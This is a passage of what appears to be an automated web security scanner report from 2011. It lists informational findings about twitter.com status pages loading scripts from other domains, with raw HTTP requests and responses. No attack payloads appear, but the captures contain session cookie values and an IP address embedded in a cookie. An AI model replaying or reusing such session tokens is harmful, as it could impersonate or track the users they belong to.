Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlOGQ5NDRlZjY3YTQ2%250AYWM2ZGYzMThmZDkyMTM0MDg4MmE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--c030eb45f2f6e8c13e64a5ed3403115c11bb644b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.472. http://twitter.com/malsup/status/28451243869339648 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28451243869339648

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224779-24208-21272
ETag: "4dec5d0def9c15c79fc9b85459882692"
Last-Modified: Fri, 28 Jan 2011 14:26:19 GMT
X-Runtime: 0.05780
Content-Type: text/html; charset=utf-8
Content-Length: 13734
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlY2UxZTYzZWM1Mzhi%250ANzUwOTg5MmZhODg2NzBlNTE3ZmE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--92abfd30a75287ea7b714b4c2d719303b28dc49f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.473. http://twitter.com/malsup/status/29343613573926913 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29343613573926913

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224768-45229-19192
ETag: "61be2a00c7b94607e218eb5ebb7189c0"
Last-Modified: Fri, 28 Jan 2011 14:26:08 GMT
X-Runtime: 0.04251
Content-Type: text/html; charset=utf-8
Content-Length: 13824
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlMDhhNzE0NWUzZGQy%250AYThjMGFmMzNlOGU2N2YzMWMyNmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--d7b87ffd3961937960551fd20ef085add3dc652a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.474. http://twitter.com/malsup/status/29343613573926913 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29343613573926913

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-3807-3566
ETag: "209ef292297365689cee15ddf84b693d"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.04444
Content-Type: text/html; charset=utf-8
Content-Length: 13822
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlYzg1MjllMjk5NjEw%250AMzQ2MDJlOTY2NDA3YTViNWM2NWI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--dab7e194361dd90806d103d15c3f8fb3e9b20000; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.475. http://twitter.com/malsup/status/29343882311372800 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-86611-17718
ETag: "8e8ba1c134c1602542f62fdaa8e9f7dd"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.05141
Content-Type: text/html; charset=utf-8
Content-Length: 13680
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlOTMwZjZkOTU4Nzcz%250AZmZlODFmOTdmMGIwMjJjZmMwZTk6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--4ec685a9450e1b8fefd04b4578645a1edde9bad3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.476. http://twitter.com/malsup/status/29343882311372800 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-10828-8128
ETag: "1ecb577ace1df13c48be71fe9a1107a1"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.03324
Content-Type: text/html; charset=utf-8
Content-Length: 13679
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlY2FiMGEyM2NkYTE4%250AMjRhYjdkOTk1ZGQ2MDc1ZTQxNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--8bdc41071876712c384942b7b84c016d5d49c703; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.477. http://twitter.com/malsup/status/29343882311372800 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234462-43608-16469
ETag: "6f4159ba16106dbca0ab28e5abdcd87f"
Last-Modified: Fri, 28 Jan 2011 17:07:42 GMT
X-Runtime: 0.06398
Content-Type: text/html; charset=utf-8
Content-Length: 13549
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--af926656a34cc3f93d125f9734871e044d840812; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.478. http://twitter.com/malsup/status/29510556067041280 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29510556067041280

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-42900-60801
ETag: "d61b7e8839b68f0e6bbfeea3f24f11e7"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.06556
Content-Type: text/html; charset=utf-8
Content-Length: 13632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlYjkxNjUxMjBkZmM0%250AYTJhMGUyNjZiZDRjZWFhMTg5YzQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--879a5af66cf85b03132a55e267e75f8e107db447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.479. http://twitter.com/malsup/status/29510556067041280 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29510556067041280

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-75187-19997
ETag: "a77c87b2d290924bf5a75e249dd9dcf2"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.22372
Content-Type: text/html; charset=utf-8
Content-Length: 13632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
